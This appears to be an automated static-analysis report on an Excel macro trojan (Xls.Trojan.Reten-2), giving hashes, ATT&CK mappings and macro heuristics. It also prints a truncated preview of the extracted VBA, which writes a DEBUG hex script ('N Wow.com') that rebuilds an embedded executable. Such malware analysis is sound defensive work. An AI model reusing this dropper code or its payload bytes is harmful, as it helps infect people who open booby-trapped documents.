Xls.Trojan.Reten-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 476007e11c6e1ae1…

MALICIOUS

Office (OLE)

116.5 KB Created: 2000-07-25 20:43:03 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: df134e581ab1aaf700ac117f15ad1272 SHA-1: 3f11c417fd2346e45a81486c09797dd587c651ca SHA-256: 476007e11c6e1ae1b3bafc3f8495ba4a4762836db36e6b2a6e68f0576c8bb6e0
220 Risk Score

Malware Insights

Xls.Trojan.Reten-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Reten-2. It contains VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening the document. The extracted script attempts to write a file named 'N Wow.com' which likely serves as a downloader for a secondary payload.

Heuristics 4

  • ClamAV: Xls.Trojan.Reten-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Reten-2
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 157497 bytes
SHA-256: 9d0168fedfa33b1e633adde9fce60948c6a3606b3b4ffc14dc71c663369fea94
Detection
ClamAV: Xls.Trojan.Reten-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Project_P"



































Function Val33333()
    Dim hFile As Long
    hFile = FreeFile
    Open strFile For Output Access Write As hFile
Print #hFile, "N Wow.com"
Print #hFile, "E 0100 4D 5A 36 01 01 00 00 00 04 00 00 00 FF FF 00 00"
Print #hFile, "E 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00"
Print #hFile, "E 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0130 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00"
Print #hFile, "E 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68"
Print #hFile, "E 0150 69 73 20 70 72 6F 67 72 61 6D 20 72 65 71 75 69"
Print #hFile, "E 0160 72 65 73 20 4D 69 63 72 6F 73 6F 66 74 20 57 69"
Print #hFile, "E 0170 6E 64 6F 77 73 2E 0D 0A 24 00 00 00 00 00 00 00"
Print #hFile, "E 0180 4E 45 05 3C 9F 00 0F 00 00 00 00 00 02 03 02 00"
Print #hFile, "E 0190 00 04 00 14 1A 00 01 00 00 00 02 00 02 00 02 00"
Print #hFile, "E 01A0 3D 00 40 00 50 00 85 00 8E 00 92 00 2E 01 00 00"
Print #hFile, "E 01B0 02 00 04 00 00 00 02 08 18 00 0C 01 00 00 0A 03"
Print #hFile, "E 01C0 1A 00 39 0C 50 1D 39 0C F6 00 94 02 51 0C 94 02"
Print #hFile, "E 01D0 04 00 0E 80 01 00 00 00 00 00 24 01 02 00 30 1C"
Print #hFile, "E 01E0 2C 00 00 00 00 00 03 80 01 00 00 00 00 00 26 01"
Print #hFile, "E 01F0 2F 00 30 1C 01 80 00 00 00 00 00 00 08 41 4C 4F"
Print #hFile, "E 0200 41 50 49 43 4F 05 41 4C 4F 41 50 00 00 00 01 00"
Print #hFile, "E 0210 08 00 00 06 4B 45 52 4E 45 4C 04 55 53 45 52 02"
Print #hFile, "E 0220 FF 01 CD 3F 01 16 0A 01 CD 3F 01 18 0B 00 15 41"
Print #hFile, "E 0230 20 6D 69 6E 69 6D 75 6D 20 41 70 70 6C 69 63 61"
Print #hFile, "E 0240 74 69 6F 6E 00 00 09 45 58 43 49 54 50 52 4F 43"
Print #hFile, "E 0250 02 00 15 4F 56 45 52 4C 41 50 50 45 44 57 49 4E"
Print #hFile, "E 0260 44 4F 57 50 52 4F 43 31 01 00 00 00 00 00 00 00"
Print #hFile, "E 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #hFile, "E 02B0 FF FF B0 FF 50 9A DD 01 3C 0B 33 ED 55 9A FF FF"
Print #hFile, "E 02C0 00 00 0B C0 74 EC 8C 06 46 00 81 C1 00 01 72 E2"
Print #hFile, "E 02D0 89 0E 10 00 89 36 12 00 89 3E 14 00 89 1E 16 00"
Print #hFile, "E 02E0 8C 06 18 00 89 16 1A 00 9A FF FF 00 00 86 C4 A3"
Print #hFile, "E 02F0 48 00 B4 30 2E F7 06 10 00 01 00 74 07 9A FF FF"
Print #hFile, "E 0300 00 00 EB 02 CD 21 A3 4C 00 86 C4 A3 4A 00 2E F7"
Print #hFile, "E 0310 06 10 00 01 00 75 05 B0 00 A2 4F 00 33 C0 50 9A"
Print #hFile, "E 0320 FF FF 00 00 FF 36 14 00 9A FF FF 00 00 0B C0 74"
Print #hFile, "E 0330 81 9A F0 00 18 00 9A D4 02 94 00 9A 56 04 99 00"
Print #hFile, "E 0340 E8 43 07 FF 36 84 00 FF 36 82 00 FF 36 80 00 9A"
Print #hFile, "E 0350 C4 00 9E 00 83 C4 06 50 9A CF 01 B2 00 B8 15 00"
Print #hFile, "E 0360 E9 28 04 00 8C D8 90 45 55 8B EC 1E 8
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.